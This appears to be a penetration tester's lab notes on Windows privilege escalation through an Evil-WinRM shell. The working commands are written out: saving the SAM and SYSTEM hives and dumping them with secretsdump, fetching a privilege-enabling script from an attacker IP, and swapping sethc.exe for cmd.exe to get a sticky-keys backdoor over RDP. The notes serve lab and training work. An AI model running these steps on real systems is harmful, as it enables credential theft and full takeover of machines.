Priv Esc

*Evil-WinRM* PS C:\Users\anirudh> ls


    Directory: C:\Users\anirudh


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       11/19/2021   1:02 AM                3D Objects
d-r---       11/19/2021   1:02 AM                Contacts
d-r---       11/19/2021   5:57 AM                Desktop
d-r---       11/19/2021   1:02 AM                Documents
d-r---       11/19/2021   1:02 AM                Downloads
d-r---       11/19/2021   1:02 AM                Favorites
d-r---       11/19/2021   1:02 AM                Links
d-r---       11/19/2021   1:02 AM                Music
d-r---       11/19/2021   1:02 AM                Pictures
d-r---       11/19/2021   1:02 AM                Saved Games
d-r---       11/19/2021   1:02 AM                Searches
d-r---       11/19/2021   1:02 AM                Videos
-a----       11/19/2021  12:38 AM            197 KillExplorer.ps1

*Evil-WinRM* PS C:\programdata> reg save hklm\sam C:\programdata\sam.bak
The operation completed successfully.

*Evil-WinRM* PS C:\programdata> reg save hklm\system C:\programdata\system.bak
The operation completed successfully.

$ impacket-secretsdump -sam sam.bak -system system.bak local

Local admin password didnt work... Same with ntds.dit.....

RETURN OF THE SERESTOREPRIVILEGE

*Evil-WinRM* PS C:\programdata> curl 192.168.45.233/EnableSeRestorePrivilege.ps1 -o EnableSeRestorePrivilege.ps1

*Evil-WinRM* PS C:\programdata> ren C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.pwned
*Evil-WinRM* PS C:\programdata> ren C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

$ rdesktop 192.168.229.172

Spam sticky keys 5 times

PreviousEnumeration NextCredentials / Notes / LL

Last updated 1 year ago